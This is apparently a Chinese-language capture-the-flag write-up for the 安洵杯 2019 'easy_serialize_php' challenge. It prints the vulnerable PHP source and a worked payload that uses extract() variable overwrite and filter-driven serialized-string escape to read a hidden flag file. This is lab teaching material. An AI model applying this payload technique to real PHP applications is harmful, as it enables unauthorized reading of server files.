[安洵杯 2019]easy_serialize_php
知識點:
extract()變量覆寫
字元串覆寫逃逸(原理:序列化後的結構經過了某些處理,反而而把結構體本身的結構給打亂了)
源碼:
<?php
$function = @$_GET['f']; //get f為function
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION); //unset将$_SESSION銷毀了。
}
$_SESSION["user"] = 'guest'; //$_SESSION數組
$_SESSION['function'] = $function;
extract($_POST); //extract會導緻變量覆寫
if(!$function){
echo '<a href="index.php?f=highlight_file" target="_blank" rel="external nofollow" >source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION)); //$_SESSION數組序列号并過濾存為$serialize_info
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
phpinfo
裡面找到
d0g3_f1ag.php
思路:
f=show_image讀檔案的,讓$userinfo[‘img’]是相應的d0g3_f1ag.php的base64加密
不傳img_path
if(!$_GET[‘img_path’]){
$_SESSION[‘img’] = base64_encode(‘guest_img.png’);
利用自定義函數filter的替換進行字元串覆寫逃逸,自己把img的base放進去
payload:
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
原理:
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";} //ZDBnM19mMWFnLnBocA== → d0g3_f1ag.php
|
↓
serialize($_SESSION)
"a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
phpflag 的值 ;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==
|
↓
filter過濾後phpflag就會被替換成空
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
第一個鍵名成了 ";s:48: 7位,然後對應的值是 s:1:"1"; 即為1
因為已經閉合了,後面的部分;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}會被直接抛棄
要湊兩個:
;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
長度為48 →
s:48:
phpflag
長度7 ==
";s:48:
$flag = 'flag in /d0g3_fllllllag';
同理讀取
參考文章:https://www.cnblogs.com/h3zh1/p/12732336.html